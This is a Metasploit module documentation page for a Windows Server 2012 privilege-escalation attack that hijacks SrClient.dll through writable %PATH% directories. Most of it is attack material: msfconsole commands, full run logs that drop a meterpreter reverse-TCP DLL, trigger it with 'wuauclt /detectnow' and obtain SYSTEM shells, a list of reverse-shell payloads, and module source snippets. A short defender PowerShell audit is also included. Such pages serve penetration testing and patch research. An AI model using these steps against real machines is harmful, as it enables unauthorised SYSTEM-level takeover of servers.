Windows Server 2012 SrClient DLL hijacking - Metasploit
This page contains detailed information about how to use the exploit/windows/local/srclient_dll_hijacking Metasploit module. For a list of all Metasploit modules, visit the Metasploit Module Library.
Module Overview
Name: Windows Server 2012 SrClient DLL hijacking
Module: exploit/windows/local/srclient_dll_hijacking
Source code: modules/exploits/windows/local/srclient_dll_hijacking.rb
Disclosure date: 2021-02-19
Last modification time: 2021-09-08 21:56:02 +0000
Supported architecture(s): -
Supported platform(s): Windows
Target service / protocol: -
Target network port(s): -
List of CVEs: -
All editions of Windows Server 2012 (but not 2012 R2) are vulnerable to DLL hijacking due to the way TiWorker.exe will try to call the non-existent SrClient.dll file when Windows Update checks for updates. This issue can be leveraged for privilege escalation if %PATH% includes directories that are writable by low-privileged users. The attack can be triggered by any low-privileged user and does not require a system reboot. This module has been successfully tested on Windows Server 2012 (x64).
Module Ranking and Traits
Module Ranking:
- excellent: The exploit will never crash the service. This is the case for SQL Injection, CMD execution, RFI, LFI, etc. No typical memory corruption exploits should be given this ranking unless there are extraordinary circumstances. More information about ranking can be found here.
Stability:
- crash-safe: Module should not crash the service.
Side Effects:
- artifacts-on-disk: Module leaves a payload or a dropper on the target machine.
- ioc-in-logs: Module leaves signs of a compromise in a log file (Example: SQL injection data found in HTTP log).
- screen-effects: Module may show something on the screen (Example: a window pops up).
Basic Usage
Note: To run a local exploit, make sure you are at the msf prompt. Also, to check the session ID, use the sessions command.
msf > use exploit/windows/local/srclient_dll_hijacking
msf exploit(srclient_dll_hijacking) > show targets
... a list of targets ...
msf exploit(srclient_dll_hijacking) > set TARGET target-id
msf exploit(srclient_dll_hijacking) > show options
... show and set options ...
msf exploit(srclient_dll_hijacking) > set SESSION session-id
msf exploit(srclient_dll_hijacking) > exploit
Required Options
- SESSION: The session to run this module on.
Knowledge Base
Vulnerable Application
All editions of Windows Server 2012 (but not 2012 R2) are vulnerable to DLL hijacking due to the way TiWorker.exe will try to call the non-existent SrClient.dll file when Windows Update checks for updates. This issue can be leveraged for privilege escalation if %PATH% includes directories that are writable by low-privileged users. The attack can be triggered by any low-privileged user and does not require a system reboot.

If run with default settings, the module will enumerate the %PATH% directories and try to find one that is writable by the current user. Alternatively, a specific %PATH% directory can be provided via the WRITABLE_PATH_DIR option. If a writable %PATH% directory is found, the module will write the payload with the name SrClient.dll to the vulnerable directory.

Next, the module will try to obtain the Windows Update configuration. If Windows Update is not set to never check for updates, the module will use the WUAUCLT /DetectNow command to trigger the payload. This command will instruct Windows Update to detect and download available updates in the background. If Windows Update is set to never check for updates, WUAUCLT /DetectNow will not work, and the module will trigger the payload via the WUAUCLT /SelfUpdateManaged command. This command launches the Windows Update window in the Control Panel and tells it to start checking for updates using Windows Server Update Services (WSUS). If stealth is required, you can set the STEALTH_ONLY option to prevent the module from proceeding with exploitation in this scenario.

If the module fails to obtain the Windows Update configuration, it will use WUAUCLT /SelfUpdateManaged to trigger the payload unless the STEALTH_ONLY option is set. In the latter case, it will use the WUAUCLT /DetectNow command.
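The following PowerShell audit is an added, defender-side example and is not part of the module or its documentation. It checks the two preconditions described above on the host itself: whether any directory in the machine-wide %PATH% is writable by well-known low-privileged principals, and what the AUOptions registry value (the same one the module's check reads) is set to; it also looks for an SrClient.dll already present in a %PATH% directory. The list of principals and the report format are my own assumptions.

```powershell
# Added defender-side audit (not part of the Metasploit module or its docs).
# Assumptions: run on the Windows Server 2012 host being audited; the
# principal list below is my choice of well-known low-privileged groups and
# uses English account names.

$LowPrivPrincipals = @(
    'Everyone',
    'BUILTIN\Users',
    'NT AUTHORITY\Authenticated Users',
    'NT AUTHORITY\INTERACTIVE'
)

function Get-MachinePathDirs {
    # TiWorker.exe runs as SYSTEM, so the machine-scope PATH is the one that
    # matters for its DLL search, not the current user's PATH.
    [Environment]::GetEnvironmentVariable('Path', 'Machine') -split ';' |
        ForEach-Object { $_.Trim() } |
        Where-Object { $_ -and (Test-Path -LiteralPath $_ -PathType Container) } |
        Select-Object -Unique
}

function Get-WritablePathDirs {
    param([string[]]$Principals = $LowPrivPrincipals)
    foreach ($dir in Get-MachinePathDirs) {
        try { $acl = Get-Acl -LiteralPath $dir } catch { continue }
        foreach ($ace in $acl.Access) {
            # Only Allow ACEs are considered; a Deny ACE for the same principal
            # would override them and is not modelled here.
            if ($ace.AccessControlType -ne 'Allow') { continue }
            # WriteData (== CreateFiles) is the bit needed to drop a new file;
            # Write, Modify and FullControl all include it.
            $writeBit = [int][System.Security.AccessControl.FileSystemRights]::WriteData
            if (([int]$ace.FileSystemRights -band $writeBit) -eq 0) { continue }
            if ($Principals -contains $ace.IdentityReference.Value) {
                [pscustomobject]@{
                    Directory = $dir
                    Principal = $ace.IdentityReference.Value
                    Rights    = $ace.FileSystemRights
                }
            }
        }
    }
}

function Get-AUOptions {
    # Same value the module's check() reads: missing means Windows Update was
    # never configured, 1 means "never check for updates" (the case where the
    # module falls back to the visible /SelfUpdateManaged trigger), 2-4 are
    # the settings under which a background check can be triggered.
    $key = 'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\WindowsUpdate\Auto Update'
    $item = Get-ItemProperty -Path $key -Name AUOptions -ErrorAction SilentlyContinue
    if ($null -eq $item) { return $null }
    return [int]$item.AUOptions
}

function Find-SrClientArtifacts {
    # SrClient.dll does not exist on a clean Windows Server 2012 install, so
    # any copy in a %PATH% directory is worth investigating.
    foreach ($dir in Get-MachinePathDirs) {
        $candidate = Join-Path -Path $dir -ChildPath 'SrClient.dll'
        if (Test-Path -LiteralPath $candidate -PathType Leaf) {
            Get-Item -LiteralPath $candidate |
                Select-Object FullName, Length, LastWriteTime
        }
    }
}

# --- report ---
$writable = @(Get-WritablePathDirs)
if ($writable.Count -eq 0) {
    Write-Host '[+] No %PATH% directory is writable by low-privileged principals.'
} else {
    Write-Host '[!] %PATH% directories writable by low-privileged principals:'
    $writable | Format-Table -AutoSize
    Write-Host '    Remove the entry from the machine PATH or tighten its ACL.'
}

$au = Get-AUOptions
if ($null -eq $au) {
    Write-Host '[*] AUOptions not set: Windows Update has not been configured.'
} else {
    Write-Host "[*] AUOptions = $au (1 = never check; 2-4 = background checks possible)."
}

$artifacts = @(Find-SrClientArtifacts)
if ($artifacts.Count -gt 0) {
    Write-Host '[!] SrClient.dll found in a %PATH% directory:'
    $artifacts | Format-Table -AutoSize
}
```

Inherited ACEs that carry generic rights are shown by Get-Acl as raw integers rather than named FileSystemRights values; the WriteData bit test above still applies to them, but a Deny ACE on the same principal is not taken into account.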
This exploit has several limitations:
- The attack won't work when Windows Update is already checking for/downloading/installing updates on the target
- The attack won't work twice in a row, at least not in quick succession (because the attack causes Windows Update to check for updates)
If the module completes, but no session is created, check if TiWorker.exe is running on the target. If so, you have several options:
- Wait until TiWorker.exe is no longer running before launching the module again.
- Set WfsDelay to a rather long period (at least half an hour), and run the module again.
- Reboot the machine if you have persistence on the target and the current user has shutdown privileges (not recommended in a real-world environment)
This module has been successfully tested on Windows Server 2012 (x64).
Windows Server 2012 VM images are available at the Microsoft Evaluation Center here.
Verification Steps
- Start msfconsole
- Do: use modules/exploit/windows/local/srclient_dll_hijacking
- Do: set SESSION [SESSION ID]
- Do: run
Options
WRITABLE_PATH_DIR
The full path to a writable %PATH% directory to write the payload to. If this is not set, the module will enumerate the %PATH% directories and try to find one that is writable by the current user.
STEALTH_ONLY
If this is enabled, the module will only exploit the target if this is possible by triggering the payload via the WUAUCLT /DetectNow command, which will launch Windows Update in the background.
This means that exploitation will not proceed if Windows Update is set to never check for updates on the target.
WAIT_FOR_TIWORKER
The number of minutes to wait for TiWorker.exe to finish running if it is already active (because the exploit won't work if it is). The default value is 0.
Scenarios
Windows 2012 x64 - %PATH% enumeration (default) with Verbose set to true
msf6 exploit(windows/local/srclient_dll_hijacking) > sessions
Active sessions
===============
Id Name Type Information Connection
-- ---- ---- ----------- ----------
3 meterpreter x64/windows WIN-FCDUOQDT1NB\wynter @ WIN-FCDUOQDT1NB 192.168.91.12:8443 -> 192.168.91.16:49157 (192.168.91.16)
msf6 exploit(windows/local/srclient_dll_hijacking) > show options
Module options (exploit/windows/local/srclient_dll_hijacking):
Name Current Setting Required Description
---- --------------- -------- -----------
SESSION 3 yes The session to run this module on.
STEALTH_ONLY false no Only exploit if the payload can be triggered without launching the Windows Update UI)
WAIT_FOR_TIWORKER 0 no No. of minutes to wait for TiWorker.exe to finish running if it is already active.
WRITABLE_PATH_DIR no Path to a writable %PATH% directory to write the payload to.
Payload options (windows/x64/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC thread yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST 192.168.91.12 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
1 Windows Server 2012 (x64)
msf6 exploit(windows/local/srclient_dll_hijacking) > run
[*] Started reverse TCP handler on 192.168.91.12:4444
[*] Executing automatic check (disable AutoCheck to override)
[*] Target is Windows 2012 (6.2 Build 9200).
[*] Obtaining group information for the current user WIN-FCDUOQDT1NB\wynter...
[*]
[*] Everyone
[*] BUILTIN\Users
[*] NT AUTHORITY\INTERACTIVE
[*] CONSOLE LOGON
[*] NT AUTHORITY\Authenticated Users
[*] NT AUTHORITY\This Organization
[*] NT AUTHORITY\Local account
[*] LOCAL
[*] NT AUTHORITY\NTLM Authentication
[*]
[*] Checking for writable directories in %PATH%...
[*]
[*] Checking permissions for C:\Windows\system32
[*] Checking permissions for C:\Windows
[*] Checking permissions for C:\Windows\System32\Wbem
[*] Checking permissions for C:\Windows\System32\WindowsPowerShell\v1.0\
[*] Checking permissions for C:\wynter
[*]
[+] WIN-FCDUOQDT1NB\wynter has write permissions to the following %PATH% directories:
[*]
[*] C:\wynter
[*]
[+] The target appears to be vulnerable.
[*] Writing 5120 bytes to C:\wynter\SrClient.dll...
[*] Trying to trigger the payload in the background via the shell command `wuauclt /detectnow`
[*] Sending stage (201283 bytes) to 192.168.91.16
[*] Meterpreter session 4 opened (192.168.91.12:4444 -> 192.168.91.16:49159) at 2021-02-16 08:59:24 -0500
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
Windows 2012 x64 - WRITABLE_PATH_DIR option set, Verbose set to false
msf6 exploit(windows/local/srclient_dll_hijacking) > sessions
Active sessions
===============
Id Name Type Information Connection
-- ---- ---- ----------- ----------
8 meterpreter x64/windows WIN-FCDUOQDT1NB\wynter @ WIN-FCDUOQDT1NB 192.168.91.12:8443 -> 192.168.91.16:49158 (192.168.91.16)
msf6 exploit(windows/local/srclient_dll_hijacking) > show options
Module options (exploit/windows/local/srclient_dll_hijacking):
Name Current Setting Required Description
---- --------------- -------- -----------
SESSION 8 yes The session to run this module on.
STEALTH_ONLY false no Only exploit if the payload can be triggered without launching the Windows Update UI)
WAIT_FOR_TIWORKER 0 no No. of minutes to wait for TiWorker.exe to finish running if it is already active.
WRITABLE_PATH_DIR c:\wynter no Path to a writable %PATH% directory to write the payload to.
Payload options (windows/x64/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC thread yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST 192.168.91.12 yes The listen address (an interface may be specified)
LPORT 5555 yes The listen port
Exploit target:
Id Name
-- ----
1 Windows Server 2012 (x64)
msf6 exploit(windows/local/srclient_dll_hijacking) > run
[*] Started reverse TCP handler on 192.168.91.12:5555
[*] Executing automatic check (disable AutoCheck to override)
[*] Target is Windows 2012 (6.2 Build 9200).
[*] Obtaining group information for the current user WIN-FCDUOQDT1NB\wynter...
[*]
[*] Checking for writable directories in %PATH%...
[*]
[+] WIN-FCDUOQDT1NB\wynter has write permissions to c:\wynter
[+] The target appears to be vulnerable.
[*] Writing 5120 bytes to C:\wynter\SrClient.dll...
[!] Because Windows Update is set to never check for updates, triggering the payload requires launching the Windows Update window on the target.
[*] Trying to trigger the payload via the shell command `wuauclt /selfupdatemanaged`
[*] Sending stage (201283 bytes) to 192.168.91.16
[*] Meterpreter session 9 opened (192.168.91.12:5555 -> 192.168.91.16:49160) at 2021-02-16 09:12:28 -0500
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
Msfconsole Usage
Here is how the windows/local/srclient_dll_hijacking exploit module looks in the msfconsole:
msf6 > use exploit/windows/local/srclient_dll_hijacking
[*] Using configured payload windows/x64/meterpreter/reverse_tcp
msf6 exploit(windows/local/srclient_dll_hijacking) > show info
Name: Windows Server 2012 SrClient DLL hijacking
Module: exploit/windows/local/srclient_dll_hijacking
Platform: Windows
Arch:
Privileged: No
License: Metasploit Framework License (BSD)
Rank: Excellent
Disclosed: 2021-02-19
Provided by:
Erik Wynter
Module side effects:
artifacts-on-disk
ioc-in-logs
screen-effects
Module stability:
crash-safe
Available targets:
Id Name
-- ----
0 Windows Server 2012 (x64)
Check supported:
Yes
Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
SESSION yes The session to run this module on.
STEALTH_ONLY false no Only exploit if the payload can be triggered without launching the Windows Update UI)
WAIT_FOR_TIWORKER 0 no No. of minutes to wait for TiWorker.exe to finish running if it is already active.
WRITABLE_PATH_DIR no Path to a writable %PATH% directory to write the payload to.
Payload information:
Description:
All editions of Windows Server 2012 (but not 2012 R2) are vulnerable
to DLL hijacking due to the way TiWorker.exe will try to call the
non-existent `SrClient.dll` file when Windows Update checks for
updates. This issue can be leveraged for privilege escalation if
%PATH% includes directories that are writable by low-privileged
users. The attack can be triggered by any low-privileged user and
does not require a system reboot. This module has been successfully
tested on Windows Server 2012 (x64).
References:
https://blog.vonahi.io/srclient-dll-hijacking
Module Options
This is a complete list of options available in the windows/local/srclient_dll_hijacking exploit:
msf6 exploit(windows/local/srclient_dll_hijacking) > show options
Module options (exploit/windows/local/srclient_dll_hijacking):
Name Current Setting Required Description
---- --------------- -------- -----------
SESSION yes The session to run this module on.
STEALTH_ONLY false no Only exploit if the payload can be triggered without launching the Windows Update UI)
WAIT_FOR_TIWORKER 0 no No. of minutes to wait for TiWorker.exe to finish running if it is already active.
WRITABLE_PATH_DIR no Path to a writable %PATH% directory to write the payload to.
Payload options (windows/x64/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC thread yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Windows Server 2012 (x64)
Advanced Options
Here is a complete list of advanced options supported by the windows/local/srclient_dll_hijacking exploit:
msf6 exploit(windows/local/srclient_dll_hijacking) > show advanced
Module advanced options (exploit/windows/local/srclient_dll_hijacking):
Name Current Setting Required Description
---- --------------- -------- -----------
AutoCheck true no Run check before exploit
ContextInformationFile no The information file that contains context information
DisablePayloadHandler false no Disable the handler code for the selected payload
EXE::Custom no Use custom exe instead of automatically generating a payload exe
EXE::EICAR false no Generate an EICAR file instead of regular payload exe
EXE::FallBack false no Use the default template in case the specified one is missing
EXE::Inject false no Set to preserve the original EXE function
EXE::OldMethod false no Set to use the substitution EXE generation method.
EXE::Path no The directory in which to look for the executable template
EXE::Template no The executable template file name.
EnableContextEncoding false no Use transient context when encoding payloads
FileDropperDelay no Delay in seconds before attempting cleanup
ForceExploit false no Override check result
MSI::Custom no Use custom msi instead of automatically generating a payload msi
MSI::EICAR false no Generate an EICAR file instead of regular payload msi
MSI::Path no The directory in which to look for the msi template
MSI::Template no The msi template file name
MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted)
VERBOSE false no Enable detailed status messages
WORKSPACE no Specify the workspace for this module
WfsDelay 60 no Additional delay in seconds to wait for a session
Payload advanced options (windows/x64/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
AutoLoadStdapi true yes Automatically load the Stdapi extension
AutoRunScript no A script to run automatically on session creation.
AutoSystemInfo true yes Automatically capture system information on initialization.
AutoUnhookProcess false yes Automatically load the unhook extension and unhook the process
AutoVerifySessionTimeout 30 no Timeout period to wait for session validation to occur, in seconds
EnableStageEncoding false no Encode the second stage payload
EnableUnicodeEncoding false yes Automatically encode UTF-8 strings as hexadecimal
HandlerSSLCert no Path to a SSL certificate in unified PEM format, ignored for HTTP transports
InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript)
PayloadProcessCommandLine no The displayed command line that will be used by the payload
PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking)
PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID
PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic)
PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs
PingbackRetries 0 yes How many additional successful pingbacks
PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks
PrependMigrate false yes Spawns and runs shellcode in new process
PrependMigrateProc no Process to spawn and run shellcode in
ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST
ReverseListenerBindAddress no The specific IP address to bind to on the local system
ReverseListenerBindPort no The port to bind to on the local system if different from LPORT
ReverseListenerComm no The specific communication channel to use for this listener
ReverseListenerThreaded false yes Handle every connection in a new thread (experimental)
SessionCommunicationTimeout 300 no The number of seconds of no activity before this session should be killed
SessionExpirationTimeout 604800 no The number of seconds before this session should be forcibly shut down
SessionRetryTotal 3600 no Number of seconds try reconnecting for on network failure
SessionRetryWait 10 no Number of seconds to wait between reconnect attempts
StageEncoder no Encoder to use if EnableStageEncoding is set
StageEncoderSaveRegisters no Additional registers to preserve in the staged payload if EnableStageEncoding is set
StageEncodingFallback true no Fallback to no encoding if the selected StageEncoder is not compatible
StagerRetryCount 10 no The number of times the stager should retry if the first connect fails
StagerRetryWait 5 no Number of seconds to wait for the stager between reconnect attempts
VERBOSE false no Enable detailed status messages
WORKSPACE no Specify the workspace for this module
Exploit Targets
Here is a list of targets (platforms and systems) which the windows/local/srclient_dll_hijacking module can exploit:
msf6 exploit(windows/local/srclient_dll_hijacking) > show targets
Exploit targets:
Id Name
-- ----
0 Windows Server 2012 (x64)
Compatible Payloads
This is a list of possible payloads which can be delivered and executed on the target system using the windows/local/srclient_dll_hijacking exploit:
msf6 exploit(windows/local/srclient_dll_hijacking) > show payloads
Compatible Payloads
===================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 payload/generic/custom normal No Custom Payload
1 payload/generic/shell_bind_tcp normal No Generic Command Shell, Bind TCP Inline
2 payload/generic/shell_reverse_tcp normal No Generic Command Shell, Reverse TCP Inline
3 payload/windows/x64/exec normal No Windows x64 Execute Command
4 payload/windows/x64/loadlibrary normal No Windows x64 LoadLibrary Path
5 payload/windows/x64/messagebox normal No Windows MessageBox x64
6 payload/windows/x64/meterpreter/bind_ipv6_tcp normal No Windows Meterpreter (Reflective Injection x64), Windows x64 IPv6 Bind TCP Stager
7 payload/windows/x64/meterpreter/bind_ipv6_tcp_uuid normal No Windows Meterpreter (Reflective Injection x64), Windows x64 IPv6 Bind TCP Stager with UUID Support
8 payload/windows/x64/meterpreter/bind_named_pipe normal No Windows Meterpreter (Reflective Injection x64), Windows x64 Bind Named Pipe Stager
9 payload/windows/x64/meterpreter/bind_tcp normal No Windows Meterpreter (Reflective Injection x64), Windows x64 Bind TCP Stager
10 payload/windows/x64/meterpreter/bind_tcp_rc4 normal No Windows Meterpreter (Reflective Injection x64), Bind TCP Stager (RC4 Stage Encryption, Metasm)
11 payload/windows/x64/meterpreter/bind_tcp_uuid normal No Windows Meterpreter (Reflective Injection x64), Bind TCP Stager with UUID Support (Windows x64)
12 payload/windows/x64/meterpreter/reverse_http normal No Windows Meterpreter (Reflective Injection x64), Windows x64 Reverse HTTP Stager (wininet)
13 payload/windows/x64/meterpreter/reverse_https normal No Windows Meterpreter (Reflective Injection x64), Windows x64 Reverse HTTP Stager (wininet)
14 payload/windows/x64/meterpreter/reverse_named_pipe normal No Windows Meterpreter (Reflective Injection x64), Windows x64 Reverse Named Pipe (SMB) Stager
15 payload/windows/x64/meterpreter/reverse_tcp normal No Windows Meterpreter (Reflective Injection x64), Windows x64 Reverse TCP Stager
16 payload/windows/x64/meterpreter/reverse_tcp_rc4 normal No Windows Meterpreter (Reflective Injection x64), Reverse TCP Stager (RC4 Stage Encryption, Metasm)
17 payload/windows/x64/meterpreter/reverse_tcp_uuid normal No Windows Meterpreter (Reflective Injection x64), Reverse TCP Stager with UUID Support (Windows x64)
18 payload/windows/x64/meterpreter/reverse_winhttp normal No Windows Meterpreter (Reflective Injection x64), Windows x64 Reverse HTTP Stager (winhttp)
19 payload/windows/x64/meterpreter/reverse_winhttps normal No Windows Meterpreter (Reflective Injection x64), Windows x64 Reverse HTTPS Stager (winhttp)
20 payload/windows/x64/meterpreter_bind_named_pipe normal No Windows Meterpreter Shell, Bind Named Pipe Inline (x64)
21 payload/windows/x64/meterpreter_bind_tcp normal No Windows Meterpreter Shell, Bind TCP Inline (x64)
22 payload/windows/x64/meterpreter_reverse_http normal No Windows Meterpreter Shell, Reverse HTTP Inline (x64)
23 payload/windows/x64/meterpreter_reverse_https normal No Windows Meterpreter Shell, Reverse HTTPS Inline (x64)
24 payload/windows/x64/meterpreter_reverse_ipv6_tcp normal No Windows Meterpreter Shell, Reverse TCP Inline (IPv6) (x64)
25 payload/windows/x64/meterpreter_reverse_tcp normal No Windows Meterpreter Shell, Reverse TCP Inline x64
26 payload/windows/x64/peinject/bind_ipv6_tcp normal No Windows Inject Reflective PE Files, Windows x64 IPv6 Bind TCP Stager
27 payload/windows/x64/peinject/bind_ipv6_tcp_uuid normal No Windows Inject Reflective PE Files, Windows x64 IPv6 Bind TCP Stager with UUID Support
28 payload/windows/x64/peinject/bind_named_pipe normal No Windows Inject Reflective PE Files, Windows x64 Bind Named Pipe Stager
29 payload/windows/x64/peinject/bind_tcp normal No Windows Inject Reflective PE Files, Windows x64 Bind TCP Stager
30 payload/windows/x64/peinject/bind_tcp_rc4 normal No Windows Inject Reflective PE Files, Bind TCP Stager (RC4 Stage Encryption, Metasm)
31 payload/windows/x64/peinject/bind_tcp_uuid normal No Windows Inject Reflective PE Files, Bind TCP Stager with UUID Support (Windows x64)
32 payload/windows/x64/peinject/reverse_named_pipe normal No Windows Inject Reflective PE Files, Windows x64 Reverse Named Pipe (SMB) Stager
33 payload/windows/x64/peinject/reverse_tcp normal No Windows Inject Reflective PE Files, Windows x64 Reverse TCP Stager
34 payload/windows/x64/peinject/reverse_tcp_rc4 normal No Windows Inject Reflective PE Files, Reverse TCP Stager (RC4 Stage Encryption, Metasm)
35 payload/windows/x64/peinject/reverse_tcp_uuid normal No Windows Inject Reflective PE Files, Reverse TCP Stager with UUID Support (Windows x64)
36 payload/windows/x64/powershell_bind_tcp normal No Windows Interactive Powershell Session, Bind TCP
37 payload/windows/x64/powershell_reverse_tcp normal No Windows Interactive Powershell Session, Reverse TCP
38 payload/windows/x64/shell/bind_ipv6_tcp normal No Windows x64 Command Shell, Windows x64 IPv6 Bind TCP Stager
39 payload/windows/x64/shell/bind_ipv6_tcp_uuid normal No Windows x64 Command Shell, Windows x64 IPv6 Bind TCP Stager with UUID Support
40 payload/windows/x64/shell/bind_named_pipe normal No Windows x64 Command Shell, Windows x64 Bind Named Pipe Stager
41 payload/windows/x64/shell/bind_tcp normal No Windows x64 Command Shell, Windows x64 Bind TCP Stager
42 payload/windows/x64/shell/bind_tcp_rc4 normal No Windows x64 Command Shell, Bind TCP Stager (RC4 Stage Encryption, Metasm)
43 payload/windows/x64/shell/bind_tcp_uuid normal No Windows x64 Command Shell, Bind TCP Stager with UUID Support (Windows x64)
44 payload/windows/x64/shell/reverse_tcp normal No Windows x64 Command Shell, Windows x64 Reverse TCP Stager
45 payload/windows/x64/shell/reverse_tcp_rc4 normal No Windows x64 Command Shell, Reverse TCP Stager (RC4 Stage Encryption, Metasm)
46 payload/windows/x64/shell/reverse_tcp_uuid normal No Windows x64 Command Shell, Reverse TCP Stager with UUID Support (Windows x64)
47 payload/windows/x64/shell_bind_tcp normal No Windows x64 Command Shell, Bind TCP Inline
48 payload/windows/x64/shell_reverse_tcp normal No Windows x64 Command Shell, Reverse TCP Inline
49 payload/windows/x64/vncinject/bind_ipv6_tcp normal No Windows x64 VNC Server (Reflective Injection), Windows x64 IPv6 Bind TCP Stager
50 payload/windows/x64/vncinject/bind_ipv6_tcp_uuid normal No Windows x64 VNC Server (Reflective Injection), Windows x64 IPv6 Bind TCP Stager with UUID Support
51 payload/windows/x64/vncinject/bind_named_pipe normal No Windows x64 VNC Server (Reflective Injection), Windows x64 Bind Named Pipe Stager
52 payload/windows/x64/vncinject/bind_tcp normal No Windows x64 VNC Server (Reflective Injection), Windows x64 Bind TCP Stager
53 payload/windows/x64/vncinject/bind_tcp_rc4 normal No Windows x64 VNC Server (Reflective Injection), Bind TCP Stager (RC4 Stage Encryption, Metasm)
54 payload/windows/x64/vncinject/bind_tcp_uuid normal No Windows x64 VNC Server (Reflective Injection), Bind TCP Stager with UUID Support (Windows x64)
55 payload/windows/x64/vncinject/reverse_http normal No Windows x64 VNC Server (Reflective Injection), Windows x64 Reverse HTTP Stager (wininet)
56 payload/windows/x64/vncinject/reverse_https normal No Windows x64 VNC Server (Reflective Injection), Windows x64 Reverse HTTP Stager (wininet)
57 payload/windows/x64/vncinject/reverse_tcp normal No Windows x64 VNC Server (Reflective Injection), Windows x64 Reverse TCP Stager
58 payload/windows/x64/vncinject/reverse_tcp_rc4 normal No Windows x64 VNC Server (Reflective Injection), Reverse TCP Stager (RC4 Stage Encryption, Metasm)
59 payload/windows/x64/vncinject/reverse_tcp_uuid normal No Windows x64 VNC Server (Reflective Injection), Reverse TCP Stager with UUID Support (Windows x64)
60 payload/windows/x64/vncinject/reverse_winhttp normal No Windows x64 VNC Server (Reflective Injection), Windows x64 Reverse HTTP Stager (winhttp)
61 payload/windows/x64/vncinject/reverse_winhttps normal No Windows x64 VNC Server (Reflective Injection), Windows x64 Reverse HTTPS Stager (winhttp)
Evasion Options
Here is the full list of possible evasion options supported by the windows/local/srclient_dll_hijacking exploit in order to evade defenses (e.g. Antivirus, EDR, Firewall, NIDS etc.):
msf6 exploit(windows/local/srclient_dll_hijacking) > show evasion
Module evasion options:
Name Current Setting Required Description
---- --------------- -------- -----------
Error Messages
This module may fail with the following error messages:
- TiWorker.exe is already running on the target. The module will monitor the process every 10 seconds for up to <WAIT_FOR_TIWORKER> minute(s)...
- TiWorker.exe is no longer running on the target. Proceding with exploitation.
- Target is not Windows Server 2012.
- Target is Windows Server 2012 R2, but only Windows Server 2012 is vulnerable.
- Target is Windows Server 2012, but cannot be exploited because Windows Update has not been configured.
- Received unexpected reply when trying to obtain the Windows Update setting.
- Session is already elevated
- Unsupported payload architecture (<PAYLOAD_ARCH>). Only 64-bit (x64) payloads are supported.
- TiWorker.exe is already running on the target. Set `WAIT_FOR_TIWORKER` to force the module to wait for the process to finish.
- Because Windows Update is set to never check for updates, triggering the payload requires launching the Windows Update window on the target.
- Exploitation cannot proceed stealthily. If you still want to exploit, set `STEALTH_ONLY` to false.
- Windows Update is not configured or returned an unexpected value. Exploitation may not work.
- Using ForceExploit requires `WRITABLE_PATH_DIR` to be set.
Check for the possible causes in the code snippets below, taken from the module source code. This can often help in identifying the root cause of the problem.
TiWorker.exe is already running on the target. The module will monitor the process every 10 seconds for up to <WAIT_FOR_TIWORKER> minute(s)...
Here is a relevant code snippet related to the "TiWorker.exe is already running on the target. The module will monitor the process every 10 seconds for up to <WAIT_FOR_TIWORKER> minute(s)..." error message:
      print_status("Trying to trigger the payload via the shell command `#{trigger_cmd}`")
    end
  end

  def monitor_tiworker
    print_warning("TiWorker.exe is already running on the target. The module will monitor the process every 10 seconds for up to #{wait_for_tiworker} minute(s)...")
    wait_time_left = wait_for_tiworker
    sleep_time = 0
    while wait_time_left > 0
      sleep 10

TiWorker.exe is no longer running on the target. Proceding with exploitation.
Here is a relevant code snippet related to the "TiWorker.exe is no longer running on the target. Proceding with exploitation." error message:
    while wait_time_left > 0
      sleep 10

      host_processes = client.sys.process.get_processes
      if host_processes.none? { |ps| ps['name'] == 'TiWorker.exe' }
        print_status('TiWorker.exe is no longer running on the target. Proceding with exploitation.')
        break
      end

      sleep_time += 10
      next unless sleep_time == 60
Target is not Windows Server 2012.
Here is a relevant code snippet related to the "Target is not Windows Server 2012." error message:
  end

  def check
    # check OS
    unless sysinfo['OS'].include?('2012')
      return Exploit::CheckCode::Safe('Target is not Windows Server 2012.')
    end

    if sysinfo['OS'].include?('R2')
      return Exploit::CheckCode::Safe('Target is Windows Server 2012 R2, but only Windows Server 2012 is vulnerable.')
    end
Target is Windows Server 2012 R2, but only Windows Server 2012 is vulnerable.
Here is a relevant code snippet related to the "Target is Windows Server 2012 R2, but only Windows Server 2012 is vulnerable." error message:
    unless sysinfo['OS'].include?('2012')
      return Exploit::CheckCode::Safe('Target is not Windows Server 2012.')
    end

    if sysinfo['OS'].include?('R2')
      return Exploit::CheckCode::Safe('Target is Windows Server 2012 R2, but only Windows Server 2012 is vulnerable.')
    end

    print_status("Target is #{sysinfo['OS']}")

    # obtain the Windows Update setting to see if exploitation could work at all
Target is Windows Server 2012, but cannot be exploited because Windows Update has not been configured.
Here is a relevant code snippet related to the "Target is Windows Server 2012, but cannot be exploited because Windows Update has not been configured." error message:
    # obtain the Windows Update setting to see if exploitation could work at all
    @wupdate_setting = registry_getvaldata('HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\WindowsUpdate\\Auto Update', 'AUOptions')

    if @wupdate_setting.nil?
      # if this is true, Windows Update has probably never been configured on the target, and the attack most likely won't work.
      return Exploit::CheckCode::Safe('Target is Windows Server 2012, but cannot be exploited because Windows Update has not been configured.')
    end

    unless (1..4).include?(@wupdate_setting)
